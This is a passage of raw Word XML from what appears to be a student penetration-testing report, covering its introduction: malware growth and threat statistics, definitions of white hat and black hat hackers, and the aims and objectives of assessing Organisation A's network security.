                    <a:srcRect t="18308"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4250055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1">
                          <a:lumMod val="50000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17044BA0" w14:textId="1C954845" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc111363567"/>
      <w:bookmarkStart w:id="13" w:name="_Toc111363704"/>
      <w:bookmarkStart w:id="14" w:name="_Toc111981728"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Growth of malware between 2013 and 2022 </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1942672690"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1AD5E9C2" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B756689" w14:textId="4F6ACCB0" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It was concluded by </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1080336039"/>
          <w:placeholder>
            <w:docPart w:val="076EDDCD79DE44DC93936E0E0EBCA221"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> that in 2019 a staggering 93.6% of observed malware was polymorphic, which means that it can change its code constantly to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB4BF2" w14:textId="58D7A0DE" w:rsidR="00DF42B8" w:rsidRDefault="00A71210" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="003D18A1">
        <w:t xml:space="preserve">yber criminals’ </w:t>
      </w:r>
      <w:r w:rsidR="21523073" w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve">motivation may be changing according to </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1624788729"/>
          <w:placeholder>
            <w:docPart w:val="A0997C5AEE394EB78893892DCA3BF135"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="21523073" w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve"> with a move from instant money-making tactics such as ransomware to intelligence and data gathering that can be used on subsequent attacks that </w:t>
      </w:r>
      <w:r w:rsidR="003D18A1">
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidR="21523073" w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve"> a better financial return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD42E7" w14:textId="6DF6704C" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5CCE0127">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In a Security Threat Report by </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1399347646"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="003D18A1">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve">most valuable information to cyber criminals versus the biggest cyber threats to organisations was set out, which can be seen in figure 4, highlighting that customer information was the most </w:t>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Int_0e6078sz"/>
      <w:r w:rsidRPr="5CCE0127">
        <w:t>valuable asset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve"> and phishing was the biggest threat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C7667" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6194D135" wp14:editId="252ACC53">
            <wp:extent cx="5731510" cy="3421380"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="26670"/>
            <wp:docPr id="9" name="Picture 9" descr="12 top cybersecurity threats against organisations 2019 stati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2 top cybersecurity threats against organisations 2019 statistic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421380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1">
                          <a:lumMod val="50000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA74021" w14:textId="42214D36" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc111363568"/>
      <w:bookmarkStart w:id="17" w:name="_Toc111363705"/>
      <w:bookmarkStart w:id="18" w:name="_Toc111981729"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Valuable assets and biggest threats </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1684019991"/>
          <w:placeholder>
            <w:docPart w:val="FEA8D09E1C4743D19BEC2A3CB6996E41"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="22A04D58" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="006B383F" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789E1BA7" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc113190692"/>
      <w:r>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Cybercriminals and Hackers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6497DB30" w14:textId="37A98653" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>The term hacker is used generically to describe someone that gains unauthorised access to an organisation’s devices/assets. There are many forms but for ease of reference this report will outline two types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0B4A7" w14:textId="5D17ADCB" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">White Hat Hackers (also known as ethical hackers) use penetration testing methodologies in an authorised attempt to find vulnerabilities within an organisation’s cyber assets that is open to be exploited via malicious methods. Organisations use penetration tests to assess their networks, systems, application security and it is not for the tester to attempt to ‘hack’ the organisation it is for the tester to identify business </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">risks associated with an attack. These security professionals report the vulnerabilities back to the organisation so that any threats can be mitigated </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="339995608"/>
          <w:placeholder>
            <w:docPart w:val="3E6AB743BD494E82A65780FF864B8B24"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[13]–[15]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF39F1" w14:textId="6F6C4476" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Black Hat Hackers (also known as threat actors) are a</w:t>
      </w:r>
      <w:r w:rsidR="00A71210">
        <w:t>n organisation or a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="00A71210">
        <w:t xml:space="preserve">individual </w:t>
      </w:r>
      <w:r>
        <w:t>that use their knowledge to compromise an organisation’s assets either by stealing, compromising, damaging or for any other malicious intention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEB322" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc113190693"/>
      <w:r>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Cyber Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="47EAFE6F" w14:textId="56B1DE08" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cyber security is the use of technologies and policies designed to protect computer networks, data, applications and assets from unauthorised access, destruction, change, attack, or denial of service thus ensuring confidentiality, integrity, and availability of data and services </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-614831379"/>
          <w:placeholder>
            <w:docPart w:val="A20C4381D955412C8FEA095412BE9874"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[13], [16]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E3590" w14:textId="43C1E2CE" w:rsidR="00DF42B8" w:rsidRPr="00EB5D9C" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc113190694"/>
      <w:r>
        <w:t>Aim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="54F9B9A4" w14:textId="3AFA463A" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The aim of this report is to </w:t>
      </w:r>
      <w:r w:rsidR="00BC4937">
        <w:t>investigate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whether </w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>rganisation</w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve"> A’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> network and cybersecurity stance is sufficient to defend against attacks. This procedural approach will aid </w:t>
      </w:r>
      <w:r w:rsidR="00782365">
        <w:t>Or</w:t>
      </w:r>
      <w:r>
        <w:t>ganisation</w:t>
      </w:r>
      <w:r w:rsidR="00A02515">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r>
        <w:t>, cybersecurity experts and other students understand the necessity for continual monitoring, upgrading and the importance of being vigilant regarding network security.</w:t>
      </w:r>
      <w:r w:rsidR="00BC4937">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B53AABD" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc113190695"/>
      <w:r>
        <w:t>Objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="23C9C631" w14:textId="0E465B89" w:rsidR="00DF42B8" w:rsidRDefault="008F3830" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>To accomplish the aim of this project the following objectives will be carried out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4FBC1" w14:textId="4D4F4C52" w:rsidR="00DF42B8" w:rsidRDefault="001F2A77" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clearly </w:t>
      </w:r>
      <w:r w:rsidR="001D69DD">
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> rules of engagement before the start of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FAC633" w14:textId="5BBB108C" w:rsidR="00DF42B8" w:rsidRDefault="001F2A77" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Create v</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve">irtual machines with </w:t>
      </w:r>
      <w:r w:rsidR="003D18A1">
        <w:t>various operating systems (OS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and software</w:t>
      </w:r>
      <w:r w:rsidR="003D18A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920E8AE" w14:textId="7FF33B52" w:rsidR="00DF42B8" w:rsidRDefault="001F2A77" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Research and conduct literature review of</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00782365">
        <w:t>the C</w:t>
      </w:r>
      <w:r w:rsidRPr="00782365">
        <w:t xml:space="preserve">ommon </w:t>
      </w:r>
      <w:r w:rsidR="00782365" w:rsidRPr="00782365">
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00782365">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00782365" w:rsidRPr="00782365">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00782365">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00782365" w:rsidRPr="00782365">
        <w:t>xposures</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00782365">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00782365">
        <w:t xml:space="preserve">(CVEs) </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00782365">
        <w:t>found during the scan is essential</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> and will be prerequisite</w:t>
      </w:r>
      <w:r w:rsidR="00021203">
        <w:t xml:space="preserve"> to plan</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:r w:rsidR="00782365">
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00C27218">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313F0B0B" w14:textId="00F0D4A8" w:rsidR="00C27218" w:rsidRDefault="00C27218" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conduct experiments/exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3A5F84" w14:textId="39849BA0" w:rsidR="00DF42B8" w:rsidRDefault="001F2A77" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The experiments conducted will be discussed and evaluated. The results of the experiments carried out will be </w:t>
      </w:r>
      <w:r w:rsidR="00DA1EA3">
        <w:t>analysed and assessed and presented to Organisation A for them to remediate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578BC8A5" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00D44358" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc113190696"/>
      <w:r w:rsidRPr="00D44358">
        <w:t>Project Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="289D3CD5" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="001E0F19" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Figure 5 sets out the structure of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33337785" w14:textId="4E9C526B" w:rsidR="00DF42B8" w:rsidRDefault="00AF76C0" w:rsidP="00D44358">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="709"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF76C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E12B8B2" wp14:editId="4D3AD23E">
            <wp:extent cx="6747164" cy="2889933"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="24765"/>
            <wp:docPr id="760259185" name="Picture 76025918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85" name="Picture 760259185" descr="Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6758947" cy="2894980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="002060"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="587CEF60" w14:textId="10D494C1" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00782365">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc111363569"/>
      <w:bookmarkStart w:id="25" w:name="_Toc111363706"/>
      <w:bookmarkStart w:id="26" w:name="_Toc111981730"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Project Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="4BF80958" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058B5C26" w14:textId="59E3EBC3" w:rsidR="00DF42B8" w:rsidRPr="008177DD" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc113190697"/>
      <w:r>
        <w:t>1.7</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0067301D">
        <w:t>Introduction Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4E5AD5DA" w14:textId="4C9D19CC" w:rsidR="00DF42B8" w:rsidRPr="008177DD" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Chapter one set out the aim and objectives of the project and an outline of the project structure was illustrated. A background to the Internet, cybercrime, and cyber security was explained. The subsequent chapter will focus on cyber security, the tools and techniques used to compromise networks and current literature pertaining to this field.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCAE0F1" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="0031688E" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc113190698"/>
      <w:r w:rsidRPr="0031688E">
        <w:lastRenderedPageBreak/>
        <w:t>CHAPTER 2: RESEARCH AND LITERATURE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="3B2441BC" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
